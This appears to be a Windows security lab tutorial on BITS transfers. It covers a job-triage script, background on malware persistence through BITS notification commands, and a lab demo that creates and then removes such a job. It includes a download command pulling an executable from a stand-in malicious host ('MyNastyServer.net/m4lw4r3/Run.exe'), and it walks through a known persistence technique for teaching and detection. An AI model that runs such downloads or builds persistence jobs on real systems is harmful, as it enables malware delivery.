powershell

Windows ships command-line tooling for transferring files with BITS. BITSAdmin is now deprecated, but the BITS PowerShell cmdlets (the BitsTransfer module) cover most of the same tasks. An example of a PowerShell command that starts a BITS download job is shown below.

Start-BitsTransfer -Source http://MyNastyServer.net/m4lw4r3/Run.exe -Destination C:\users\Administrator\Desktop\Run.exe

Another useful cmdlet is Get-BitsTransfer, which lists the jobs currently in the BITS queue and is the first stop when looking for harmful or unwanted transfers. By default it only shows jobs owned by the current user; the example below returns every property of every job on the machine, including jobs owned by other accounts such as SYSTEM (the -AllUsers switch needs an elevated session).

Get-BitsTransfer -AllUsers | select *

More information on the BITS cmdlets can be found using the following link.
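The one-liner above dumps every property, which is hard to read across more than a handful of jobs. The script below is an added example, not part of the original lab, that turns the same Get-BitsTransfer -AllUsers output into one row per file with the indicators a reviewer cares about: the remote host, whether an executable is landing in a user-writable path, a long retry history, and whether a notification command line is attached to the job. The list of expected update hosts, the file-extension and path patterns, and the retry threshold are assumptions for this lab; adjust them for your environment.

```powershell
# Added example (not from the original lab): triage every BITS job on the host.
# Run from an elevated PowerShell so that -AllUsers can see SYSTEM-owned jobs.
function Get-BitsJobReview {
    [CmdletBinding()]
    param(
        # Remote hosts expected to serve BITS downloads here (assumed list).
        [string[]]$KnownGoodHosts = @('windowsupdate.com', 'microsoft.com', 'windows.com'),
        # Retry count above which a stuck job is worth a second look (assumed).
        [int]$RetryThreshold = 10
    )

    Get-BitsTransfer -AllUsers | ForEach-Object {
        $job = $_
        # A job with no files yet still occupies a queue slot; emit it once.
        $files = if ($job.FileList) { @($job.FileList) } else { @($null) }

        foreach ($file in $files) {
            $remote = $file.RemoteName
            $local  = $file.LocalName
            $flags  = New-Object System.Collections.Generic.List[string]

            # 1. Remote host is not one we expect BITS to talk to.
            $remoteHost = $null
            if ($remote) {
                try   { $remoteHost = ([uri]$remote).Host } catch { $remoteHost = $remote }
                $trusted = $KnownGoodHosts | Where-Object { $remoteHost -like "*$_" }
                if (-not $trusted) { $flags.Add("untrusted-source:$remoteHost") }
            }

            # 2. Executable content landing somewhere a normal user can write.
            if ($local -match '\.(exe|dll|ps1|vbs|js|hta|scr|bat|cmd)$') {
                $flags.Add('executable-destination')
            }
            if ($local -match '\\(Users|Temp|AppData|ProgramData|Public)\\') {
                $flags.Add('user-writable-path')
            }

            # 3. A command line BITS will run when the job finishes (the
            #    notification feature). Property is exposed on Windows 10 and later.
            if ($job.NotifyCmdLine) {
                $flags.Add("notify-cmdline:$($job.NotifyCmdLine -join ' ')")
            }

            # 4. Jobs that keep retrying a dead source are the classic leftover.
            if ($job.JobState -eq 'TransientError' -and
                $job.TransientErrorCount -gt $RetryThreshold) {
                $flags.Add("retrying:$($job.TransientErrorCount)")
            }

            [pscustomobject]@{
                JobId   = $job.JobId
                Name    = $job.DisplayName
                Owner   = $job.OwnerAccount
                State   = $job.JobState
                Created = $job.CreationTime
                Remote  = $remote
                Local   = $local
                Flags   = ($flags -join ';')
            }
        }
    }
}

# Usage: most-flagged jobs first.
Get-BitsJobReview |
    Sort-Object { ($_.Flags -split ';' | Where-Object { $_ }).Count } -Descending |
    Format-Table -AutoSize

# Once a job is confirmed malicious, cancel it and delete its partial files.
# Remove-BitsTransfer supports -WhatIf/-Confirm, so prompt before acting:
#   Get-BitsTransfer -AllUsers -JobId <JobId> | Remove-BitsTransfer -Confirm
```

Flags are a starting point, not a verdict: legitimate third-party updaters also pull executables into ProgramData from hosts outside the assumed list, so check the owner account and creation time against what is expected on that machine before removing anything.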

abuse

The features that make BITS a discreet, low-bandwidth mechanism for transferring legitimate data also make it an ideal candidate for copying malicious files. Because Windows Update relies on it, BITS is present on practically every Windows machine, and its traffic is typically allowed through host and network firewalls since it uses ordinary HTTP(S) from a trusted service process.

BITS has been used in a range of attacks, known to date back to 2007, which have become more sophisticated over time. In 2016, the SecureWorks® Counter Threat Unit™ investigated malware-related network alerts that continued after the malware in question had been removed from the compromised system. They found that, besides creating BITS jobs, the malware had used the BITS notification feature (a command line that BITS runs when a job finishes) so that a queued job could download and execute a new payload even after antivirus software had removed the original malware. More information can be found in the following blog post.
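To see what the artifact described above looks like from the reviewer's side, the following is an added lab example; it is not code from the original post or from the SecureWorks research. It creates a queued BITS job with a notification command attached using the documented cmdlets, shows how that job appears in Get-BitsTransfer, and then removes it. Assumptions: the source URL is a loopback address with nothing listening, so the job sits in the queue retrying rather than completing; the attached command only writes a marker file; the two-element program/arguments form of -NotifyCmdLine should be checked against Get-Help Set-BitsTransfer -Parameter NotifyCmdLine on your build. Run it elevated in an isolated lab.

```powershell
# Added lab example (not from the original post): build, observe and remove a
# queued BITS job that carries a notification command.
$source = 'http://127.0.0.1:8080/payload.bin'        # assumed unreachable stand-in
$dest   = Join-Path $env:TEMP 'payload.bin'
$marker = Join-Path $env:TEMP 'bits-notify-fired.txt'

# 1. Create the job asynchronously so it is queued instead of blocking the shell.
$job = Start-BitsTransfer -Source $source -Destination $dest `
                          -Asynchronous -DisplayName 'LabPersistenceDemo'

# 2. Attach a command for BITS to run when the job reaches the Transferred or
#    Error state. Harmless here: it only writes a marker file.
#    (Assumed format: program, then its argument string.)
Set-BitsTransfer -BitsJob $job -NotifyCmdLine @(
    "$env:SystemRoot\System32\cmd.exe",
    "/c echo fired > `"$marker`""
)

# 3. What a reviewer sees. The job is owned by the account that created it and
#    stays in TransientError while the source is down; BITS keeps retrying
#    until the no-progress timeout (14 days by default) moves it to Error,
#    at which point the notification command would run.
Get-BitsTransfer -AllUsers |
    Where-Object DisplayName -eq 'LabPersistenceDemo' |
    Select-Object JobId, OwnerAccount, JobState, TransientErrorCount, CreationTime,
                  NotifyCmdLine,
                  @{ n = 'Remote'; e = { $_.FileList.RemoteName } },
                  @{ n = 'Local';  e = { $_.FileList.LocalName } }

# 4. Clean up. Remove-BitsTransfer cancels the job and deletes partial files,
#    so nothing is left in the queue to fire later.
Get-BitsTransfer -AllUsers |
    Where-Object DisplayName -eq 'LabPersistenceDemo' |
    Remove-BitsTransfer
```

The point of step 3 is that the job, not the process that created it, is the persistence: deleting the file that ran Start-BitsTransfer changes nothing in the queue, which is why a review has to enumerate the queue itself with -AllUsers rather than look only at running processes.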

In this lab you will use the BITS PowerShell cmdlets to review a number of BITS jobs on the system and answer a series of questions about what you find.

Informative Alert

To review all of the BITS transfers, including those owned by other accounts, you will need to run PowerShell as an administrator. You can do this by right-clicking the PowerShell icon and selecting Run as administrator.